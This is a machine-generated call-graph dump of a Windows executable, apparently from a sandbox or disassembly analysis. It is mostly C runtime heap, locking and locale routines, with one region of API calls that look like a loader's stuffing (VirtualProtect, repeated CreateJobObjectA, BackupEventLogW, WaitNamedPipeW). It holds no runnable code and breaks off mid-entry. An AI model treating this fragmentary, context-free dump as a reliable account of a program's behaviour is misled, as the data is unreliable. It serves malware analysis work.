40bd4b GetCurrentThreadId 9135->9137 9137->9128 9138 40bd61 9138->9128 9140 40bbb4 9139->9140 9141 40bbcf 9139->9141 9142 40bb24 __decode_pointer 6 API calls 9140->9142 9141->9128 9141->9129 9143 40bbbf TlsSetValue 9142->9143 9143->9141 9146 406189 __close 9144->9146 9145 406202 __dosmaperr __close 9145->9138 9146->9145 9147 4061c8 9146->9147 9149 407670 __lock 66 API calls 9146->9149 9147->9145 9148 4061dd HeapFree 9147->9148 9148->9145 9150 4061ef 9148->9150 9153 4061a0 ___sbh_find_block 9149->9153 9151 40747b __close 66 API calls 9150->9151 9152 4061f4 GetLastError 9151->9152 9152->9145 9154 4061ba 9153->9154 9157 4076d3 9153->9157 9164 4061d3 9154->9164 9158 407712 9157->9158 9163 4079b4 9157->9163 9159 4078fe VirtualFree 9158->9159 9158->9163 9160 407962 9159->9160 9161 407971 VirtualFree HeapFree 9160->9161 9160->9163 9167 40d760 9161->9167 9163->9154 9171 407596 LeaveCriticalSection 9164->9171 9166 4061da 9166->9147 9168 40d778 9167->9168 9169 40d79f __VEC_memcpy 9168->9169 9170 40d7a7 9168->9170 9169->9170 9170->9163 9171->9166 9173 4075b9 __close 9172->9173 9174 4075df 9173->9174 9198 408507 9173->9198 9180 4075ef __close 9174->9180 9244 40d677 9174->9244 9180->9110 9182 407610 9186 407670 __lock 68 API calls 9182->9186 9183 407601 9185 40747b __close 68 API calls 9183->9185 9185->9180 9187 407617 9186->9187 9188 40764b 9187->9188 9189 40761f 9187->9189 9191 40617d ___freetlocinfo 68 API calls 9188->9191 9190 40c782 ___lock_fhandle InitializeCriticalSectionAndSpinCount 9189->9190 9192 40762a 9190->9192 9193 40763c 9191->9193 9192->9193 9194 40617d ___freetlocinfo 68 API calls 9192->9194 9250 407667 9193->9250 9196 407636 9194->9196 9197 40747b __close 68 API calls 9196->9197 9197->9193 9253 40ddce 9198->9253 9201 40851b 9203 40835c __NMSG_WRITE 68 API calls 9201->9203 9205 4075ce 9201->9205 9202 40ddce __set_error_mode 68 API calls 9202->9201 9204 408533 9203->9204 9206 40835c __NMSG_WRITE 68 API calls 9204->9206 9207 40835c 9205->9207 9206->9205 9208 408370 9207->9208 9209 40ddce __set_error_mode 65 API calls 9208->9209 9240 4075d5 9208->9240 9210 408392 9209->9210 9211 4084d0 GetStdHandle 9210->9211 9213 40ddce __set_error_mode 65 API calls 9210->9213 9212 4084de _strlen 9211->9212 9211->9240 9216 4084f7 WriteFile 9212->9216 9212->9240 9214 4083a3 9213->9214 9214->9211 9215 4083b5 9214->9215 9215->9240 9259 40dd66 9215->9259 9216->9240 9219 4083eb GetModuleFileNameA 9221 408409 9219->9221 9226 40842c _strlen 9219->9226 9223 40dd66 _strcpy_s 65 API calls 9221->9223 9224 408419 9223->9224 9224->9226 9227 40973f __invoke_watson 10 API calls 9224->9227 9225 40846f 9284 40dc3d 9225->9284 9226->9225 9275 40dcb1 9226->9275 9227->9226 9232 408493 9233 40dc3d _strcat_s 65 API calls 9232->9233 9235 4084a7 9233->9235 9234 40973f __invoke_watson 10 API calls 9234->9232 9237 40973f __invoke_watson 10 API calls 9235->9237 9239 4084b8 9235->9239 9236 40973f __invoke_watson 10 API calls 9236->9225 9237->9239 9293 40dad4 9239->9293 9241 406c3c 9240->9241 9331 406c11 GetModuleHandleW 9241->9331 9247 40d680 9244->9247 9246 4075fa 9246->9182 9246->9183 9247->9246 9248 40d697 Sleep 9247->9248 9334 40625a 9247->9334 9249 40d6ac 9248->9249 9249->9246 9249->9247 9364 407596 LeaveCriticalSection 9250->9364 9252 40766e 9252->9180 9254 40dddd 9253->9254 9255 40747b __close 68 API calls 9254->9255 9258 40850e 9254->9258 9256 40de00 9255->9256 9257 409867 __close 6 API calls 9256->9257 9257->9258 9258->9201 9258->9202 9260 40dd77 9259->9260 9263 40dd7e 9259->9263 9260->9263 9266 40dda4 9260->9266 9261 40747b __close 68 API calls 9262 40dd83 9261->9262 9264 409867 __close 6 API calls 9262->9264 9263->9261 9265 4083d7 9264->9265 9265->9219 9268 40973f 9265->9268 9266->9265 9267 40747b __close 68 API calls 9266->9267 9267->9262 9320 40b080 9268->9320 9270 40976c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9271 409848 GetCurrentProcess TerminateProcess 9270->9271 9272 40983c __invoke_watson 9270->9272 9322 40dac5 9271->9322 9272->9271 9274 4083e8 9274->9219 9278 40dcc3 9275->9278 9276 40dcc7 9277 40747b __close 68 API calls 9276->9277 9279 40845c 9276->9279 9283 40dce3 9277->9283 9278->9276 9278->9279 9281 40dd0d 9278->9281 9279->9225 9279->9236 9280 409867 __close 6 API calls 9280->9279 9281->9279 9282 40747b __close 68 API calls 9281->9282 9282->9283 9283->9280 9285 40dc55 9284->9285 9288 40dc4e 9284->9288 9286 40747b __close 68 API calls 9285->9286 9287 40dc5a 9286->9287 9289 409867 __close 6 API calls 9287->9289 9288->9285 9291 40dc89 9288->9291 9290 408482 9289->9290 9290->9232 9290->9234 9291->9290 9292 40747b __close 68 API calls 9291->9292 9292->9287 9294 40bb1b ___crtMessageBoxW 7 API calls 9293->9294 9295 40dae4 9294->9295 9296 40daf7 LoadLibraryA 9295->9296 9298 40db7f 9295->9298 9297 40db0c GetProcAddress 9296->9297 9309 40dc21 9296->9309 9299 40db22 9297->9299 9297->9309 9302 40bb24 __decode_pointer 6 API calls 9298->9302 9316 40dba9 9298->9316 9303 40baa9 __encode_pointer 7 API calls 9299->9303 9300 40bb24 __decode_pointer 6 API calls 9300->9309 9301 40bb24 __decode_pointer 6 API calls 9310 40dbec 9301->9310 9304 40db9c 9302->9304 9305 40db28 GetProcAddress 9303->9305 9306 40bb24 __decode_pointer 6 API calls 9304->9306 9307 40baa9 __encode_pointer 7 API calls 9305->9307 9306->9316 9308 40db3d GetProcAddress 9307->9308 9311 40baa9 __encode_pointer 7 API calls 9308->9311 9309->9240 9315 40bb24 __decode_pointer 6 API calls 9310->9315 9318 40dbd4 9310->9318 9312 40db52 GetProcAddress 9311->9312 9313 40baa9 __encode_pointer 7 API calls 9312->9313 9314 40db67 9313->9314 9314->9298 9317 40db71 GetProcAddress 9314->9317 9315->9318 9316->9301 9316->9318 9319 40baa9 __encode_pointer 7 API calls 9317->9319 9318->9300 9319->9298 9321 40b08c __VEC_memzero 9320->9321 9321->9270 9323 40dacd 9322->9323 9324 40dacf IsDebuggerPresent 9322->9324 9323->9274 9330 40fe79 9324->9330 9327 41177a SetUnhandledExceptionFilter UnhandledExceptionFilter 9328 411797 __invoke_watson 9327->9328 9329 41179f GetCurrentProcess TerminateProcess 9327->9329 9328->9329 9329->9274 9330->9327 9332 406c25 GetProcAddress 9331->9332 9333 406c35 ExitProcess 9331->9333 9332->9333 9335 40626c 9334->9335 9336 40630d 9334->9336 9338 40627d 9335->9338 9344 4062c9 RtlAllocateHeap 9335->9344 9346 4062f9 9335->9346 9347 40854f __calloc_impl 6 API calls 9335->9347 9349 4062fe 9335->9349 9351 406305 9335->9351 9352 40620b 9335->9352 9337 40854f __calloc_impl 6 API calls 9336->9337 9339 406313 9337->9339 9338->9335 9340 408507 __FF_MSGBANNER 67 API calls 9338->9340 9343 40835c __NMSG_WRITE 67 API calls 9338->9343 9345 406c3c _fast_error_exit 3 API calls 9338->9345 9341 40747b __close 67 API calls 9339->9341 9340->9338 9341->9351 9343->9338 9344->9335 9345->9338 9348 40747b __close 67 API calls 9346->9348 9347->9335 9348->9349 9350 40747b __close 67 API calls 9349->9350 9350->9351 9351->9247 9353 406217 __close 9352->9353 9354 406248 __close 9353->9354 9355 407670 __lock 68 API calls 9353->9355 9354->9335 9356 40622d 9355->9356 9357 407e82 ___sbh_alloc_block 5 API calls 9356->9357 9358 406238 9357->9358 9360 406251 9358->9360 9363 407596 LeaveCriticalSection 9360->9363 9362 406258 9362->9354 9363->9362 9364->9252 9366 407a30 HeapAlloc 9365->9366 9367 4079fc HeapReAlloc 9365->9367 9368 407a1a 9366->9368 9370 407a53 VirtualAlloc 9366->9370 9367->9368 9369 407a1e 9367->9369 9368->9118 9369->9366 9370->9368 9371 407a6d HeapFree 9370->9371 9371->9368 9373 407ab0 VirtualAlloc 9372->9373 9375 407af7 9373->9375 9375->9116 9376->9121 9377->9054 9396 407596 LeaveCriticalSection 9378->9396 9380 40bca7 9380->9064 9382 40ef53 InterlockedIncrement 9381->9382 9383 40ef56 9381->9383 9382->9383 9384 40ef60 InterlockedIncrement 9383->9384 9385 40ef63 9383->9385 9384->9385 9386 40ef70 9385->9386 9387 40ef6d InterlockedIncrement 9385->9387 9388 40ef7a InterlockedIncrement 9386->9388 9390 40ef7d 9386->9390 9387->9386 9388->9390 9389 40ef96 InterlockedIncrement 9389->9390 9390->9389 9391 40efa6 InterlockedIncrement 9390->9391 9392 40efb1 InterlockedIncrement 9390->9392 9391->9390 9392->9067 9397 407596 LeaveCriticalSection 9393->9397 9395 40bcf5 9395->9069 9396->9380 9397->9395 9398->8921 9400 411303 9399->9400 9401 4112fc 9399->9401 9402 40747b __close 68 API calls 9400->9402 9401->9400 9405 41132f 9401->9405 9403 411308 9402->9403 9404 409867 __close 6 API calls 9403->9404 9406 411317 9404->9406 9405->9406 9407 40747b __close 68 API calls 9405->9407 9406->8950 9407->9403 9409 40c1d6 9408->9409 9410 40baa9 __encode_pointer 7 API calls 9409->9410 9411 40c1ee 9409->9411 9410->9409 9411->8960 9415 40c131 9412->9415 9414 40c17a 9414->8962 9416 40c13d __close 9415->9416 9423 406c54 9416->9423 9422 40c15e __close 9422->9414 9424 407670 __lock 68 API calls 9423->9424 9425 406c5b 9424->9425 9426 40c046 9425->9426 9427 40bb24 __decode_pointer 6 API calls 9426->9427 9428 40c05a 9427->9428 9429 40bb24 __decode_pointer 6 API calls 9428->9429 9430 40c06a 9429->9430 9439 40c0ed 9430->9439 9446 411089 9430->9446 9432 40baa9 __encode_pointer 7 API calls 9434 40c0e2 9432->9434 9433 40c088 9435 40c0ac 9433->9435 9442 40c0d4 9433->9442 9459 40d708 9433->9459 9436 40baa9 __encode_pointer 7 API calls 9434->9436 9438 40d708 __realloc_crt 74 API calls 9435->9438 9435->9439 9440 40c0c2 9435->9440 9436->9439 9438->9440 9443 40c167 9439->9443 9440->9439 9441 40baa9 __encode_pointer 7 API calls 9440->9441 9441->9442 9442->9432 9508 406c5d 9443->9508 9447 411095 __close 9446->9447 9448 4110c2 9447->9448 9449 4110a5 9447->9449 9451 411103 HeapSize 9448->9451 9454 407670 __lock 68 API calls 9448->9454 9450 40747b __close 68 API calls 9449->9450 9453 4110aa 9450->9453 9452 4110ba __close 9451->9452 9452->9433 9455 409867 __close 6 API calls 9453->9455 9456 4110d2 ___sbh_find_block 9454->9456 9455->9452 9464 411123 9456->9464 9461 40d711 9459->9461 9462 40d750 9461->9462 9463 40d731 Sleep 9461->9463 9468 411492 9461->9468 9462->9435 9463->9461 9467 407596 LeaveCriticalSection 9464->9467 9466 4110fe 9466->9451 9466->9452 9467->9466 9469 41149e __close 9468->9469 9470 4114b3 9469->9470 9471 4114a5 9469->9471 9473 4114c6 9470->9473 9474 4114ba 9470->9474 9472 40625a _malloc 68 API calls 9471->9472 9490 4114ad __dosmaperr __close 9472->9490 9481 411638 9473->9481 9503 4114d3 ___sbh_resize_block _realloc ___sbh_find_block 9473->9503 9475 40617d ___freetlocinfo 68 API calls 9474->9475 9475->9490 9476 41166b 9479 40854f __calloc_impl 6 API calls 9476->9479 9477 41163d HeapReAlloc 9477->9481 9477->9490 9478 407670 __lock 68 API calls 9478->9503 9480 411671 9479->9480 9482 40747b __close 68 API calls 9480->9482 9481->9476 9481->9477 9483 41168f 9481->9483 9484 40854f __calloc_impl 6 API calls 9481->9484 9487 411685 9481->9487 9482->9490 9485 40747b __close 68 API calls 9483->9485 9483->9490 9484->9481 9488 411698 GetLastError 9485->9488 9489 40747b __close 68 API calls 9487->9489 9488->9490 9492 411606 9489->9492 9490->9461 9491 41155e HeapAlloc 9491->9503 9492->9490 9494 41160b GetLastError 9492->9494 9493 4115b3 HeapReAlloc 9493->9503 9494->9490 9495 407e82 ___sbh_alloc_block 5 API calls 9495->9503 9496 41161e 9496->9490 9498 40747b __close 68 API calls 9496->9498 9497 40854f __calloc_impl 6 API calls 9497->9503 9500 41162b 9498->9500 9499 4076d3 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 9499->9503 9500->9488 9500->9490 9501 411601 9502 40747b __close 68 API calls 9501->9502 9502->9492 9503->9476 9503->9478 9503->9490 9503->9491 9503->9493 9503->9495 9503->9496 9503->9497 9503->9499 9503->9501 9504 4115d6 9503->9504 9507 407596 LeaveCriticalSection 9504->9507 9506 4115dd 9506->9503 9507->9506 9511 407596 LeaveCriticalSection 9508->9511 9510 406c64 9510->9422 9511->9510 9513 404ed3 __write_nolock 9512->9513 9514 404ef8 GetModuleHandleW LocalAlloc 9513->9514 9636 40650a 9513->9636 9634 404e1c GetProcAddress VirtualProtect 9514->9634 9517 404f2b 9519 404f6b 9517->9519 9520 404f56 CreateJobObjectA 9517->9520 9518 404eea 9521 406e58 68 API calls 9518->9521 9522 404f79 7 API calls 9519->9522 9523 405001 9519->9523 9520->9517 9521->9514 9522->9519 9524 405003 GetLastError 9523->9524 9525 40578f GetSystemDefaultLCID 9523->9525 9526 4057aa 9523->9526 9524->9523 9524->9525 9525->9523 9525->9526 9639 404d37 9526->9639 9528 4057b9 9529 4057af 9528->9529 9529->9528 9530 4057d3 FindActCtxSectionStringW 9529->9530 9531 4057e7 9529->9531 9530->9529 9532 405804 11 API calls 9531->9532 9533 405891 9531->9533 9532->9531 9635 404b4d LoadLibraryA 9533->9635 9535 405896 9535->8878 9535->9003 9537 406713 __close 9536->9537 9538 406726 9537->9538 9539 406752 9537->9539 9540 40747b __close 68 API calls 9538->9540 9957 408f70 9539->9957 9542 40672b 9540->9542 9544 409867 __close 6 API calls 9542->9544 9550 40673b __close 9544->9550 9545 4067d5 9547 406801 9545->9547 9969 4099e3 9545->9969 10000 406819 9547->10000 9550->8970 9554 40747b __close 68 API calls 9557 4067c5 9554->9557 9558 409867 __close 6 API calls 9557->9558 9558->9545 9560 40664e __close 9559->9560 9561 406679 __flsbuf 9560->9561 9562 40665c 9560->9562 10161 408fb1 9561->10161 9563 40747b __close 68 API calls 9562->9563 9564 406661 9563->9564 9565 409867 __close 6 API calls 9564->9565 9569 406671 __close 9565->9569 9567 40668b __flsbuf 9568 4099e3 __stbuf 68 API calls 9567->9568 9570 40669d __flsbuf 9568->9570 9569->8977 9571 409b59 __output_l 104 API calls 9570->9571 9572 4066b5 __flsbuf 9571->9572 9573 409a7f __ftbuf 102 API calls 9572->9573 9574 4066c6 9573->9574 10166 4066de 9574->10166 9577 40661a 9576->9577 9578 4065ff 9576->9578 10176 40652b 9577->10176 9579 40747b __close 68 API calls 9578->9579 9581 406604 9579->9581 9583 409867 __close 6 API calls 9581->9583 9582 40662a 9584 405f50 9582->9584 9585 40747b __close 68 API calls 9582->9585 9583->9584 9586 4064ae 9584->9586 9585->9584 9587 4064ba __close 9586->9587 9588 4064c1 9587->9588 9589 4064ca 9587->9589 10482 4063d4 9588->10482 9591 408f70 __lock_file 69 API calls 9589->9591 9592 4064d2 9591->9592 10492 40638c 9592->10492 9595 4064c7 __close 9595->8981 9600 406b3f __close 9597->9600 9598 406b4d 9599 40747b __close 68 API calls 9598->9599 9603 406b52 9599->9603 9600->9598 9601 406b7b 9600->9601 9602 408f70 __lock_file 69 API calls 9601->9602 9604 406b83 9602->9604 9605 409867 __close 6 API calls 9603->9605 10538 406aa9 9604->10538 9609 406b62 __close 9605->9609 9609->8983 10599 406060 9610->10599 9612 404b41 9613 40694a 9612->9613 9616 406956 __flsbuf __close 9613->9616 9614 40696a 9615 40747b __close 68 API calls 9614->9615 9617 40696f 9615->9617 9616->9614 9619 4069f4 __flsbuf 9616->9619 9620 408d86 __fileno 68 API calls 9616->9620 9618 409867 __close 6 API calls 9617->9618 9622 40697f __close 9618->9622 9621 408fb1 _puts 69 API calls 9619->9621 9624 40699d 9620->9624 9623 406a04 __flsbuf 9621->9623 9622->8987 9625 4099e3 __stbuf 68 API calls 9623->9625 9624->9614 9624->9619 9626 406a17 __flsbuf _strlen 9625->9626 10659 40b5c9 9626->10659 9628 406a37 __flsbuf 9629 406a4a __flsbuf 9628->9629 10671 40b465 9628->10671 9630 409a7f __ftbuf 102 API calls 9629->9630 9631 406a7f 9630->9631 10692 406a96 9631->10692 9634->9517 9635->9535 9644 409304 9636->9644 9640 404d44 __write_nolock 9639->9640 9641 404d70 9 API calls 9640->9641 9643 404dfd 9640->9643 9950 404bb7 9640->9950 9641->9640 9643->9529 9645 40931d 9644->9645 9648 4090d5 9645->9648 9660 40904e 9648->9660 9650 4090fc 9651 40747b __close 68 API calls 9650->9651 9653 409101 9651->9653 9654 409867 __close 6 API calls 9653->9654 9659 40651b 9654->9659 9656 409139 9657 40917e 9656->9657 9668 40f111 9656->9668 9658 40747b __close 68 API calls 9657->9658 9657->9659 9658->9659 9659->9518 9661 409061 9660->9661 9667 4090ae 9660->9667 9675 40bd70 9661->9675 9664 40908e 9664->9667 9695 40e92f 9664->9695 9667->9650 9667->9656 9669 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 9668->9669 9670 40f125 9669->9670 9674 40f132 9670->9674 9883 40e00f 9670->9883 9674->9656 9676 40bcf7 __getptd_noexit 68 API calls 9675->9676 9677 40bd78 9676->9677 9678 409066 9677->9678 9679 406be8 __amsg_exit 68 API calls 9677->9679 9678->9664 9680 40f09b 9678->9680 9679->9678 9681 40f0a7 __close 9680->9681 9682 40bd70 __getptd 68 API calls 9681->9682 9683 40f0ac 9682->9683 9684 40f0da 9683->9684 9686 40f0be 9683->9686 9685 407670 __lock 68 API calls 9684->9685 9687 40f0e1 9685->9687 9688 40bd70 __getptd 68 API calls 9686->9688 9711 40f05d 9687->9711 9692 40f0c3 9688->9692 9693 406be8 __amsg_exit 68 API calls 9692->9693 9694 40f0d1 __close 9692->9694 9693->9694 9694->9664 9696 40e93b __close 9695->9696 9697 40bd70 __getptd 68 API calls 9696->9697 9698 40e940 9697->9698 9699 407670 __lock 68 API calls 9698->9699 9700 40e952 9698->9700 9701 40e970 9699->9701 9703 40e960 __close 9700->9703 9707 406be8 __amsg_exit 68 API calls 9700->9707 9702 40e9b9 9701->9702 9704 40e9a1 InterlockedIncrement 9701->9704 9705 40e987 InterlockedDecrement 9701->9705 9879 40e9ca 9702->9879 9703->9667 9704->9702 9705->9704 9708 40e992 9705->9708 9707->9703 9708->9704 9709 40617d ___freetlocinfo 68 API calls 9708->9709 9710 40e9a0 9709->9710 9710->9704 9712 40f093 9711->9712 9713 40f061 9711->9713 9719 40f105 9712->9719 9713->9712 9714 40ef35 ___addlocaleref 8 API calls 9713->9714 9715 40f074 9714->9715 9715->9712 9722 40efc4 9715->9722 9878 407596 LeaveCriticalSection 9719->9878 9721 40f10c 9721->9692 9723 40efd5 InterlockedDecrement 9722->9723 9724 40f058 9722->9724 9725 40efea InterlockedDecrement 9723->9725 9726 40efed 9723->9726 9724->9712 9736 40edec 9724->9736 9725->9726 9727 40eff7 InterlockedDecrement 9726->9727 9728 40effa 9726->9728 9727->9728 9729 40f004 InterlockedDecrement 9728->9729 9730 40f007 9728->9730 9729->9730 9731 40f011 InterlockedDecrement 9730->9731 9732 40f014 9730->9732 9731->9732 9733 40f02d InterlockedDecrement 9732->9733 9734 40f03d InterlockedDecrement 9732->9734 9735 40f048 InterlockedDecrement 9732->9735 9733->9732 9734->9732 9735->9724 9737 40ee03 9736->9737 9738 40ee70 9736->9738 9737->9738 9741 40ee37 9737->9741 9751 40617d ___freetlocinfo 68 API calls 9737->9751 9739 40eebd 9738->9739 9740 40617d ___freetlocinfo 68 API calls 9738->9740 9748 40eee4 9739->9748 9790 411ed8 9739->9790 9743 40ee91 9740->9743 9745 40ee58 9741->9745 9753 40617d ___freetlocinfo 68 API calls 9741->9753 9746 40617d ___freetlocinfo 68 API calls 9743->9746 9749 40617d ___freetlocinfo 68 API calls 9745->9749 9747 40eea4 9746->9747 9754 40617d ___freetlocinfo 68 API calls 9747->9754 9750 40ef29 9748->9750 9760 40617d 68 API calls ___freetlocinfo 9748->9760 9755 40ee65 9749->9755 9756 40617d ___freetlocinfo 68 API calls 9750->9756 9757 40ee2c 9751->9757 9752 40617d ___freetlocinfo 68 API calls 9752->9748 9758 40ee4d 9753->9758 9759 40eeb2 9754->9759 9761 40617d ___freetlocinfo 68 API calls 9755->9761 9762 40ef2f 9756->9762 9766 4120b2 9757->9766 9782 41206d 9758->9782 9765 40617d ___freetlocinfo 68 API calls 9759->9765 9760->9748 9761->9738 9762->9712 9765->9739 9767 4120bf 9766->9767 9781 41213c 9766->9781 9768 4120d0 9767->9768 9769 40617d ___freetlocinfo 68 API calls 9767->9769 9770 4120e2 9768->9770 9772 40617d ___freetlocinfo 68 API calls 9768->9772 9769->9768 9771 4120f4 9770->9771 9773 40617d ___freetlocinfo 68 API calls 9770->9773 9774 412106 9771->9774 9775 40617d ___freetlocinfo 68 API calls 9771->9775 9772->9770 9773->9771 9776 40617d ___freetlocinfo 68 API calls 9774->9776 9777 412118 9774->9777 9775->9774 9776->9777 9778 40617d ___freetlocinfo 68 API calls 9777->9778 9779 41212a 9777->9779 9778->9779 9780 40617d ___freetlocinfo 68 API calls 9779->9780 9779->9781 9780->9781 9781->9741 9783 4120ae 9782->9783 9784 41207a 9782->9784 9783->9745 9785 41208a 9784->9785 9786 40617d ___freetlocinfo 68 API calls 9784->9786 9787 41209c 9785->9787 9788 40617d ___freetlocinfo 68 API calls 9785->9788 9786->9785 9787->9783 9789 40617d ___freetlocinfo 68 API calls 9787->9789 9788->9787 9789->9783 9791 411ee9 9790->9791 9792 40eedd 9790->9792 9793 40617d ___freetlocinfo 68 API calls 9791->9793 9792->9752 9794 411ef1 9793->9794 9795 40617d ___freetlocinfo 68 API calls 9794->9795 9796 411ef9 9795->9796 9797 40617d ___freetlocinfo 68 API calls 9796->9797 9798 411f01 9797->9798 9799 40617d ___freetlocinfo 68 API calls 9798->9799 9800 411f09 9799->9800 9801 40617d ___freetlocinfo 68 API calls 9800->9801 9802 411f11 9801->9802 9803 40617d ___freetlocinfo 68 API calls 9802->9803 9804 411f19 9803->9804 9805 40617d ___freetlocinfo 68 API calls 9804->9805 9806 411f20 9805->9806 9807 40617d ___freetlocinfo 68 API calls 9806->9807 9808 411f28 9807->9808 9809 40617d ___freetlocinfo 68 API calls 9808->9809 9810 411f30 9809->9810 9811 40617d ___freetlocinfo 68 API calls 9810->9811 9812 411f38 9811->9812 9813 40617d ___freetlocinfo 68 API calls 9812->9813 9814 411f40 9813->9814 9815 40617d ___freetlocinfo 68 API calls 9814->9815 9816 411f48 9815->9816 9817 40617d ___freetlocinfo 68 API calls 9816->9817 9818 411f50 9817->9818 9819 40617d ___freetlocinfo 68 API calls 9818->9819 9820 411f58 9819->9820 9821 40617d ___freetlocinfo 68 API calls 9820->9821 9822 411f60 9821->9822 9823 40617d ___freetlocinfo 68 API calls 9822->9823 9824 411f68 9823->9824 9825 40617d ___freetlocinfo 68 API calls 9824->9825 9826 411f73 9825->9826 9827 40617d ___freetlocinfo 68 API calls 9826->9827 9828 411f7b 9827->9828 9829 40617d ___freetlocinfo 68 API calls 9828->9829 9830 411f83 9829->9830 9831 40617d ___freetlocinfo 68 API calls 9830->9831 9832 411f8b 9831->9832 9833 40617d ___freetlocinfo 68 API calls 9832->9833 9834 411f93 9833->9834 9835 40617d ___freetlocinfo 68 API calls 9834->9835 9836 411f9b 9835->9836 9837 40617d ___freetlocinfo 68 API calls 9836->9837 9838 411fa3 9837->9838 9839 40617d ___freetlocinfo 68 API calls 9838->9839 9840 411fab 9839->9840 9841 40617d ___freetlocinfo 68 API calls 9840->9841 9842 411fb3 9841->9842 9843 40617d ___freetlocinfo 68 API calls 9842->9843 9844 411fbb 9843->9844 9845 40617d ___freetlocinfo 68 API calls 9844->9845 9846 411fc3 9845->9846 9847 40617d ___freetlocinfo 68 API calls 9846->9847 9848 411fcb 9847->9848 9849 40617d ___freetlocinfo 68 API calls 9848->9849 9850 411fd3 9849->9850 9851 40617d ___freetlocinfo 68 API calls 9850->9851 9852 411fdb 9851->9852 9853 40617d ___freetlocinfo 68 API calls 9852->9853 9854 411fe3 9853->9854 9855 40617d ___freetlocinfo 68 API calls 9854->9855 9856 411feb 9855->9856 9857 40617d ___freetlocinfo 68 API calls 9856->9857 9858 411ff9 9857->9858 9859 40617d ___freetlocinfo 68 API calls 9858->9859 9860 412004 9859->9860 9861 40617d ___freetlocinfo 68 API calls 9860->9861 9862 41200f 9861->9862 9863 40617d ___freetlocinfo 68 API calls 9862->9863 9864 41201a 9863->9864 9865 40617d ___freetlocinfo 68 API calls 9864->9865 9866 412025 9865->9866 9867 40617d ___freetlocinfo 68 API calls 9866->9867 9868 412030 9867->9868 9869 40617d ___freetlocinfo 68 API calls 9868->9869 9870 41203b 9869->9870 9871 40617d ___freetlocinfo 68 API calls 9870->9871 9872 412046 9871->9872 9873 40617d ___freetlocinfo 68 API calls 9872->9873 9874 412051 9873->9874 9875 40617d ___freetlocinfo 68 API calls 9874->9875 9876 41205c 9875->9876 9877 40617d ___freetlocinfo 68 API calls 9876->9877 9877->9792 9878->9721 9882 407596 LeaveCriticalSection 9879->9882 9881 40e9d1 9881->9700 9882->9881 9884 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 9883->9884 9885 40e022 9884->9885 9886 411e96 9885->9886 9887 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 9886->9887 9888 411ea9 9887->9888 9891 411cdc 9888->9891 9892 411d28 9891->9892 9893 411cfd GetStringTypeW 9891->9893 9894 411d15 9892->9894 9896 411e0f 9892->9896 9893->9894 9895 411d1d GetLastError 9893->9895 9897 411d61 MultiByteToWideChar 9894->9897 9914 411e09 9894->9914 9895->9892 9919 4134ed GetLocaleInfoA 9896->9919 9903 411d8e 9897->9903 9897->9914 9899 40dac5 __atodbl_l 5 API calls 9901 411e94 9899->9901 9901->9674 9902 411e60 GetStringTypeA 9906 411e7b 9902->9906 9902->9914 9907 411da3 _memset ___convertcp 9903->9907 9908 40625a _malloc 68 API calls 9903->9908 9905 411ddc MultiByteToWideChar 9910 411e03 9905->9910 9911 411df2 GetStringTypeW 9905->9911 9912 40617d ___freetlocinfo 68 API calls 9906->9912 9907->9905 9907->9914 9908->9907 9915 4112cb 9910->9915 9911->9910 9912->9914 9914->9899 9916 4112d7 9915->9916 9917 4112e8 9915->9917 9916->9917 9918 40617d ___freetlocinfo 68 API calls 9916->9918 9917->9914 9918->9917 9920 413520 9919->9920 9921 41351b 9919->9921 9922 40650a ___ansicp 91 API calls 9920->9922 9923 40dac5 __atodbl_l 5 API calls 9921->9923 9922->9921 9924 411e33 9923->9924 9924->9902 9924->9914 9925 413536 9924->9925 9926 413576 GetCPInfo 9925->9926 9930 413600 9925->9930 9927 4135eb MultiByteToWideChar 9926->9927 9928 41358d 9926->9928 9927->9930 9934 4135a6 _strlen 9927->9934 9928->9927 9931 413593 GetCPInfo 9928->9931 9929 40dac5 __atodbl_l 5 API calls 9932 411e54 9929->9932 9930->9929 9931->9927 9933 4135a0 9931->9933 9932->9902 9932->9914 9933->9927 9933->9934 9935 4135d8 _memset ___convertcp 9934->9935 9936 40625a _malloc 68 API calls 9934->9936 9935->9930 9937 413635 MultiByteToWideChar 9935->9937 9936->9935 9938 41364d 9937->9938 9939 41366c 9937->9939 9941 413671 9938->9941 9942 413654 WideCharToMultiByte 9938->9942 9940 4112cb __freea 68 API calls 9939->9940 9940->9930 9943 413690 9941->9943 9944 41367c WideCharToMultiByte 9941->9944 9942->9939 9945 40d6bc __calloc_crt 68 API calls 9943->9945 9944->9939 9944->9943 9946 413698 9945->9946 9946->9939 9947 4136a1 WideCharToMultiByte 9946->9947 9947->9939 9948 4136b3 9947->9948 9949 40617d ___freetlocinfo 68 API calls 9948->9949 9949->9939 9951 404bef 9950->9951 9952 404bff BackupEventLogW 9951->9952 9953 404c07 9951->9953 9952->9953 9954 404c93 GetLastError 9953->9954 9955 404cab WaitNamedPipeW AssignProcessToJobObject GetFullPathNameW 9953->9955 9956 404d25 9953->9956 9954->9953 9955->9953 9956->9640 9958 408f82 9957->9958 9959 408fa4 EnterCriticalSection 9957->9959 9958->9959 9960 408f8a 9958->9960 9961 40675b 9959->9961 9962 407670 __lock 68 API calls 9960->9962 9961->9545 9963 408d86 9961->9963 9962->9961 9964 40676b 9963->9964 9965 408d95 9963->9965 9964->9545 9964->9554 9966 40747b __close 68 API calls 9965->9966 9967 408d9a 9966->9967 9968 409867 __close 6 API calls 9967->9968 9968->9964 9970 408d86 __fileno 68 API calls 9969->9970 9971 4099f2 9970->9971 10003 40e05a 9971->10003 9973 4067e7 9976 409b59 9973->9976 9974 4099f8 __flsbuf 9974->9973 9975 40d677 __malloc_crt 68 API calls 9974->9975 9975->9973 9977 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 9976->9977 9978 409bc0 9977->9978 9979 409bc4 9978->9979 9981 408d86 __fileno 68 API calls 9978->9981 9988 409c05 __output_l __aulldvrm _strlen 9978->9988 9980 40747b __close 68 API calls 9979->9980 9982 409bc9 9980->9982 9981->9988 9983 409867 __close 6 API calls 9982->9983 9984 409bdb 9983->9984 9985 40dac5 __atodbl_l 5 API calls 9984->9985 9986 4067f7 9985->9986 9996 409a7f 9986->9996 9987 40e00f __isleadbyte_l 78 API calls 9987->9988 9988->9979 9988->9984 9988->9987 9989 409ab3 102 API calls _write_multi_char 9988->9989 9990 40617d ___freetlocinfo 68 API calls 9988->9990 9991 410127 80 